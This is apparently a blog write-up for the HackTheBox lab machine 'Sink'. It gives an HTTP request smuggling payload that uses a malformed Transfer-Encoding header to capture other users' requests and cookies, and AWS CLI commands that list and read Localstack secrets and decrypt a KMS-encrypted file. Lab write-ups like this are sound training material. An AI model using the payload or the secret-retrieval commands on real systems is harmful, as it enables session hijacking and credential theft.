• Home
  • Blog
  • CTF
  • HTTP Request Smuggling & AWS – Sink @ HackTheBox

HTTP Request Smuggling & AWS – Sink @ HackTheBox

18Sep

HTTP Request Smuggling & AWS – Sink @ HackTheBox

By CTF , , , ,

We are solving Sink, a 50-point Linux machine on HackTheBox that involves HTTP Request Smuggling & retrieving secrets from Localstack.

Reads

Example Smuggling Request

POST /comment HTTP/1.1
Host: sink.htb:5000
Cookie: session=eyJlbWFpbCI6InhjdEBleGFtcGxlLmNvbSJ9.YUMdpw.xLkQCSRKf7EfIxXMMBDR8i8Pi9M
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Transfer-Encoding:chunked

0

POST /comment HTTP/1.1
Host: sink.htb:5000
Content-Type: application/x-www-form-urlencoded
Content-Length: 290
Cookie: session=eyJlbWFpbCI6InhjdEBleGFtcGxlLmNvbSJ9.YUMdpw.xLkQCSRKf7EfIxXMMBDR8i8Pi9M

msg=

AWS CLI Commands

aws --endpoint-url=http://127.0.0.1:4566 kms list-keys
aws --endpoint-url=http://127.0.0.1:4566 secretsmanager list-secrets
aws --endpoint-url=http://127.0.0.1:4566 secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-yVNfw"
aws kms decrypt --ciphertext-blob fileb:///home/david/Projects/Prod_Deployment/servers.enc --query Plaintext --output text --endpoint-url=http://127.0.0.1:4566 --key-id=804125db-bdf1-465a-a058-07fc87c0fad0 --encryption-algorithm RSAES_OAEP_SHA_256

Share this post

Author

Related Posts

20Nov

LDAP, WebDAV, LAPS & Unintended Solutions – Hutch @ PG Practice

We are solving Hutch from PG-Practice. For user, we will get credentials from LDAP & use them to upload a... read more

16Oct

Dynamic DNS & Command Injection – Dynstr @ HackTheBox

We are solving Dynstr, a 30-point Linux machine on HackTheBox that involves a Dynamic DNS Service & a Command Injection. read more

27Jun

Player2 @ HackTheBox

Player2 is a 50-point Linux machine on HackTheBox. For user we do some web fuzzing, call a twirp method to... read more

28Mar

Passage @ HackTheBox

Solving Passage on HackTheBox. This is an easy box involving 2 public exploits, one for the CuteNews CMS and one... read more

25Jan

AI @ HackTheBox

AI is a 30 point machine on hackthebox that involves SQL injection via speech and abusing an exposed java debugging... read more

18Jan

Player @ HackTheBox

Player is a hard box, that we solved in unintended ways that are partly patched now. read more

08Feb

Ypuffy @ HackTheBox

Ypuffy is a rather unique machine on hackthebox.eu because it features OpenBSD as operating system. In my version of getting... read more

20Mar

Crossfit @ HackTheBox

Solving Crossfit, a 50-point Linux machine on HackTheBox which involves a lot of cross-site scripting, a command-injection, and finally some... read more

12Jun

PHP Unserialize & Race Condition – Tenet @ HackTheBox

We are solving Tenet, a 30-point machine HackTheBox that involves a simple PHP deserialization vulnerability, password reuse and a race... read more

27Feb

Protected: Dream Diary 3 @ HackTheBox

There is no excerpt because this is a protected post. read more